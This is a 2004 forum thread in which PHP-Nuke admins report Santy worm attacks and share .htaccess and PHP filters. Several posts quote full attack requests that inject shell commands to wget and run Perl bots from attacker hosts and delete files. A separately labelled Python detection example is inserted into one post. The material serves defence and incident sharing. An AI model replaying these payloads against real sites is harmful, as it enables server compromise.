Nuke Cops :: View topic - visualcoders.net hacking attempts
Author Message
kjcdude
Captain
Joined: Jun 10, 2003
Posts: 441
Location: Southern California
Posted: Sat Dec 25, 2004 2:54 am

There have been many hacking attempts by http://www.visualcoders.net/ in the past day or so.

Here is the string they will try and use.

Code:
modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt


Luckily NukeSentinel has caught all attempts and has banned those IPs.

Just thought you all would like to know.

Also, many of us have posted on visualcoders.net forums with our complaints.
http://www.visualcoders.net/viewforum.php?f=10

_________________
Diablo Heat | The OC Sucks [b]Hot or Not[/b] | TheOCSucks.com The OC Sucks
br212
Nuke Soldier
Joined: Feb 29, 2004
Posts: 15
Posted: Sat Dec 25, 2004 2:59 am

--


Last edited by br212 on Sun Jan 16, 2005 1:09 pm; edited 1 time in total
Guidyy
Sergeant
Joined: Sep 01, 2003
Posts: 77
Posted: Sat Dec 25, 2004 4:37 am

Got the same Rainbow Brite on my website:
one with an American IP, the other with a Dutch IP.
Code:
http://www.yummyfood.net/index.php?name=Your_Account&op=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt

IPs
66.221.32.128
217.170.21.119

Guido
http://www.yummyfood.net
http://www.guidyy.com
Mesum
Support Staff
Joined: Mar 11, 2003
Posts: 842
Location: Chicago
Posted: Sat Dec 25, 2004 10:53 am

But that website has been suspended already.

_________________
Only FREE Dating site for Desis.
kipuka
Sergeant
Joined: Dec 19, 2003
Posts: 105
Posted: Sat Dec 25, 2004 11:52 am

This appears to be the "Santy" worm. Someone claimed he upgraded to phpbb 2.0.11 and is still having problems w/ exploitation. The decoded version of the "Santy" GET string he provided looks the same as what you posted here. http://securityfocus.com/archive/1/385462/2004-12-22/2004-12-28/0

Apparently, these jerks are fishing around now using Google for other PHP scripts. With the source code out there, we'll probably see other copycats.
http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0
VinDSL
Site Admin
Joined: Jul 08, 2003
Posts: 1193
Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs
Posted: Sat Dec 25, 2004 1:22 pm

kjcdude wrote:
Here is the string they will try and use.

Code:
modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt


Just thought you all would like to know.


Decoded:

Code:
modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget www.visualcoders.net/spybot.txt;wget www.visualcoders.net/worm1.txt;wget www.visualcoders.net/php.txt;wget www.visualcoders.net/ownz.txt;wget www.visualcoders.net/zone.txt;perl spybot.txt;perl worm1.txt;perl ownz.txt;perl php.txt

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
Raven
General
Joined: Mar 22, 2003
Posts: 5233
Location: USA
Posted: Sat Dec 25, 2004 7:08 pm

If you use .htaccess, just add these lines:

# REQUEST_URI holds only the path, so the domain has to be matched in QUERY_STRING
RewriteCond %{QUERY_STRING} visualcoders [NC]
RewriteRule ^.*$ emailsforyou.php [L]

Of course the RewriteRule can be whatever you want.

_________________
Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff
sixpack
Lieutenant
Joined: Oct 20, 2004
Posts: 165
Posted: Sat Dec 25, 2004 9:25 pm

Thanks for that! We have been getting something very close:

Code:
modules.php?...&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;rm%20-rf%20ssh.*;rm%20-rf%20bot*;wget%20grancassa.co.uk/images/botd;perl%20botd;wget%20grancassa.co.uk/images/ssh.d;perl%20ssh.d;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527


I have added the above posted .htaccess addition as well as the following:

Code:
RewriteCond %{QUERY_STRING} grancassa [NC]
RewriteRule ^.*$ emailsforyou.php [L]


Seems there is a php-Grinch on the loose... will this addition to the .htaccess work for the query string we are seeing?
Zhen-Xjell
Nuke Cops Founder
Joined: Nov 14, 2002
Posts: 5939
Posted: Sat Dec 25, 2004 11:06 pm

Although the code by Raven will work, it is not enough. There are other URLs which are used:

http://castlecops.com/article-5640-nested-0-0.html

You cannot filter on URL alone, because URLs change. I've also noticed others filtering on "echr", which is also invalid logic. The link above explains it all in the comments section.

Please be aware of how you are filtering, because you could be applying a false sense of security.

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
sixpack
Lieutenant
Joined: Oct 20, 2004
Posts: 165
Posted: Sun Dec 26, 2004 12:15 am

OK, now I am getting worried. What would be the best way to block this? I have read the posts in the links and from what I see it would be an entry in .htaccess that is:
Code:
RewriteCond %{QUERY_STRING} rush=%65 [NC]
RewriteRule ^.*$ emailsforyou.php [L]


because that variable is in every blocked script attack that we have received?

Sorry, just trying to find a definitive solution because this is the 15th script abuse logged.
VinDSL
Site Admin
Joined: Jul 08, 2003
Posts: 1193
Location: Arizona (USA) Site Admin: Lenon.com Admin: Disipal Designs
Posted: Sun Dec 26, 2004 12:16 am

Zhen-Xjell wrote:
You cannot filter on URL alone, because URLs change...

Gotta agree with that!

I've been poring over my logs and noticed a lot of Santy variants, forked from the original exploit. These particular ones all have a '&rush=' string in them.

For these variants, I apply the following directive:

Code:
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ emailsforyou.php [L]

I ran an exploit against myself, and it catches it...

_________________
.:: "The further in you go, the bigger it gets!" ::.
.:: VinDSL's Lenon.com | The Disipal Site ::.
kjcdude
Captain
Joined: Jun 10, 2003
Posts: 441
Location: Southern California
Posted: Sun Dec 26, 2004 12:22 am

I am at 36 blocked attempts so far.

I got a new variant in the script, at least it looks like it:

Code:
modules.php?name=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*

_________________
Diablo Heat | The OC Sucks [b]Hot or Not[/b] | TheOCSucks.com The OC Sucks

Last edited by kjcdude on Sun Dec 26, 2004 12:28 am; edited 1 time in total
MGCJerry
Elite Nuker
Joined: Jun 16, 2003
Posts: 220
Posted: Sun Dec 26, 2004 6:02 am

I've had my share of them too... 48 since the 24th.

http://www.2thextreme.org/test.php

_________________
Original creator of
* Fetch Mod
* RPG Races Module
* 2 The Xtreme Theme
Zhen-Xjell
Nuke Cops Founder
Joined: Nov 14, 2002
Posts: 5939
Posted: Sun Dec 26, 2004 6:12 am

In the span of 5 minutes yesterday, http://castlecops.com had over 600 attacks. Over yesterday's course, it had on average one attack per second. I've got tens of thousands of IPs as sources (unique IPs, that is).

The filter on "rush" is a stop gap measure. You are filtering on variables that exist today in the worm, which can be easily modified.

Point is, even though it is OK to filter on highly used terms like "visualcoders" or "...rush..." as per above, these can and are in fact being changed in new variations.

You need a better solution, one that involves the tick mark, and one that involves ":/". Reasoning was explained in the article's comments:

http://castlecops.com/article-5640-nested-0-0.html

However, another possible help is ensuring you filter out the tick in mainfile.php:

Simply add this line into the HTTP_GET_VARS block:

(eregi("'", $secvalue)) ||

Just in case it doesn't work, add a slash (I didn't check since I use other techniques):

(eregi("\'", $secvalue)) ||

Always aim for catch-all solutions. Otherwise, the security you implement is limited. Then again, don't implement solutions that aren't solutions, like filtering on "echr", since that doesn't really catch the real issue all the time: "chr".

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
lizard
Corporal
Joined: Aug 07, 2003
Posts: 61
Posted: Sun Dec 26, 2004 6:48 am
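An added example, not code from this thread, from NukeSentinel or from PHP-Nuke, that puts VinDSL's decoding step and Zhen-Xjell's argument together in Python. It fully URL-decodes a request (the highlight= payload is double-encoded, so one decoding pass is not enough), then compares the brittle token filter the thread started with (match "visualcoders", "grancassa" or "rush=") against a structural filter keyed on what the payload needs to function: a tick, a ":/" URL fragment inside a parameter value, "chr(" rather than "echr", and shell command chaining. The sample requests are shortened from strings quoted in the thread; the renamed-parameter variant (example.invalid) and the benign request are constructed to show where each filter lands.

```python
"""Token-based vs. structural filtering of Santy-style request strings.

Added example; not code from the Nuke Cops thread, NukeSentinel or PHP-Nuke.
"""
import re
from urllib.parse import unquote

# Tokens the thread's first-generation .htaccess rules keyed on. They change
# between variants, so a filter built on them expires with the variant.
VOLATILE_TOKENS = ("visualcoders", "grancassa", "rush=")

# Structural indicators, applied to every decoded parameter name and value.
INDICATORS = {
    "tick": re.compile(r"'"),                       # needed to break out of the quoted string
    "url": re.compile(r":/"),                       # remote include; survives "http:/" mangling
    "chr_call": re.compile(r"chr\s*\(", re.I),      # "chr(", which an "echr" filter misses
    "shell_chain": re.compile(r";\s*(wget|perl|cd|rm|cp|killall)\b", re.I),
}

def full_decode(s: str, max_rounds: int = 4) -> str:
    """Decode %xx escapes until the string stops changing (%2527 -> %27 -> ')."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def query_parts(request: str) -> list[str]:
    """Return every fully decoded parameter name and value of a request URI."""
    _, _, query = request.partition("?")
    parts = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        parts.append(full_decode(name))
        parts.append(full_decode(value))
    return parts

def token_filter(request: str) -> bool:
    """Brittle approach: does the raw request contain a known token?"""
    lowered = request.lower()
    return any(tok in lowered for tok in VOLATILE_TOKENS)

def structural_filter(request: str) -> list[str]:
    """Robust approach: which structural indicators are present after decoding?"""
    hits = set()
    for part in query_parts(request):
        for label, pattern in INDICATORS.items():
            if pattern.search(part):
                hits.add(label)
    return sorted(hits)

# Constructed samples, shortened from strings quoted in the thread.
SANTY_ORIGINAL = (
    "modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;"
    "wget%20www.visualcoders.net/spybot.txt;perl%20spybot.txt"
)
RUSH_VARIANT = (
    "modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"
    "killall%20-9%20perl;cd%20/tmp;wget%20grancassa.co.uk/images/bot;perl%20bot"
    "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54"
    "%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527"
)
# Hypothetical variant: same payload, parameter renamed and drop site moved.
RENAMED_VARIANT = (
    RUSH_VARIANT.replace("rush", "z")
    .replace("%72%75%73%68", "%7A")
    .replace("grancassa.co.uk", "example.invalid")
)
# Constructed benign request: "christmas" contains "chr" but is not a chr( call.
BENIGN = "modules.php?name=Forums&file=viewtopic&t=42&highlight=christmas"

if __name__ == "__main__":
    for label, req in [("santy", SANTY_ORIGINAL), ("rush", RUSH_VARIANT),
                       ("renamed", RENAMED_VARIANT), ("benign", BENIGN)]:
        print(f"{label:8} tokens={token_filter(req)!s:5} structural={structural_filter(req)}")
```

Run stand-alone, the token filter catches the two strings posted in the thread and nothing else: the renamed variant slips through it while the structural filter still reports the tick and the shell chain, and the benign request trips neither. That is the difference Zhen-Xjell describes between filtering on today's variable names and filtering on what the attack has to contain.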

Hi, I'm getting hundreds and hundreds of attempts on my site www.bittersweetembrace.co.uk

Some 600 or so since the 24th.

Protector and Sentinel etc. seem to be catching them because I'm getting hundreds of emails telling me scripts have been blocked. Unfortunately I don't have a great understanding of PHP etc. What, in layman's terms, can I do to stop this altogether?

Here's the latest warning email:

Date & Time: 2004-12-26 09:40:38
Blocked IP: 84.135.*.*
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.800
Query String: bittersweetembrace.co.uk/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20killall%20-9%20perl;cd%20/tmp;wget%20grancassa.co.uk/images/bot;perl%20bot;wget%20grancassa.co.uk/images/ssh.a;perl%20ssh.a;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
Forwarded For: none
Client IP: none
Remote Address: 84.135.179.174
Remote Port: 41691
Request Method: GET
Powered by phpBB © 2001, 2005 phpBB Group
Ported by Nuke Cops © 2003 www.nukecops.com